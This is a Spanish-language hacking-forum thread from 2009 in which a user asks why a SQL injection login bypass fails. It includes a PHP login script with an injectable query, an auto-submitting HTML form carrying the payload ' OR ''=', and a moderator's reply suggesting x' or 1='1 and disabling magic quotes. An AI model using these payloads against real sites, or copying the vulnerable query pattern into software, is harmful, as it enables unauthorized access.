elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  SQLi en login...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: SQLi en login...  (Leído 4,832 veces)
Banti

Desconectado Desconectado

Mensajes: 225


NULL


Ver Perfil
SQLi en login...
« en: 7 Diciembre 2009, 17:34 pm »

Tengo un problema yo otra vez....

Código:
<?  include("../Connections/conn_ig.php"); 

echo $usuario = $HTTP_POST_VARS["usuario"];
echo $contrasena = $HTTP_POST_VARS["contrasena"];

$ssql = "SELECT * FROM usuarios WHERE nombre_usuario='$usuario' and clave_usuario='$contrasena'";

$rs = mysql_query($ssql,$cosa);
$row=mysql_fetch_array($rs);

if (mysql_num_rows($rs)!=0){



//usuario y contraseña válidos and tipo='admin'
//defino una sesion y guardo datos
session_start();
session_register("autentificado");
$_SESSION["autentificado"]= "SI"; 
//panel.php tiene el panel de control
header("Location: panel.php");
}

?>
Tengo este codigo que autentifica al usuario que se conecta a la pagina... Que creo que es vulnerable a SQL Injection.

Realizo este codigo:
Código:
<body onload="document.forms[0].submit()">
<form action="http://www.pagina.com.ar/conectar.php" method="post">
<input type="text" Name="usuario" Value="admin">
<input type="text" Name="contrasena" Value="' OR ''='">
</form>
Pero no me funciona... Alguien me podria guiar?
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: SQLi en login...
« Respuesta #1 en: 7 Diciembre 2009, 19:35 pm »

mira esto...

http://www.webtaller.com/construccion/lenguajes/php/lessons/evitar_inyeccion_sql.php

capas te sirve.....
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: SQLi en login...
« Respuesta #2 en: 7 Diciembre 2009, 19:35 pm »

Intenta ponerle valores válidos en ves de nada, por ejemplo de password:
x' or 1='1
tienes la base de datos puesta verdad?
Verifica yambién que no tengas habilitado el magic quotes.
En línea

Banti

Desconectado Desconectado

Mensajes: 225


NULL


Ver Perfil
Re: SQLi en login...
« Respuesta #3 en: 8 Diciembre 2009, 00:18 am »

tienes la base de datos puesta verdad?
Sip, una 100% real.

Dario, lei un poco. Pero yo no veo ni una funcion malevola que me evite el SQLi.

Aun no entiendo que coños es magic quotes pero era esa cosita que te cambiba los caracteres "malvados" a uno no muy malvado no?

estuve viendo que cuando pongo el pass me lo recibe como:
Código:
x\' or 1=\'1 
Es por culpa de las magic quotes?
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: SQLi en login...
« Respuesta #4 en: 8 Diciembre 2009, 04:04 am »

Así es, es problemas del magic quotes.

Si quieres practicar debes deshabilitarlo desde el php.ini
En línea

Banti

Desconectado Desconectado

Mensajes: 225


NULL


Ver Perfil
Re: SQLi en login...
« Respuesta #5 en: 8 Diciembre 2009, 05:16 am »

Ah, ok Gracias otra vez!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
GiE 4.8 - SQLi
Nivel Web
Pony-Magic 4 6,969 Último mensaje 17 Diciembre 2010, 14:37 pm
por xassiz~
5013 webs vulnerables a sqli
Nivel Web
Tyrz 0 7,177 Último mensaje 12 Abril 2011, 10:01 am
por Tyrz
Error 403 ¿Posible SQli?
PHP
dimitrix 6 4,025 Último mensaje 3 Julio 2011, 07:11 am
por Spider-Net
Ayuda con SQLi
Bugs y Exploits
W0LFeR 1 3,236 Último mensaje 16 Mayo 2012, 13:52 pm
por jackgris
SQLi Ayuda
Bugs y Exploits
lCookiesPass 1 3,917 Último mensaje 13 Noviembre 2012, 21:15 pm
por ameise_1987
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines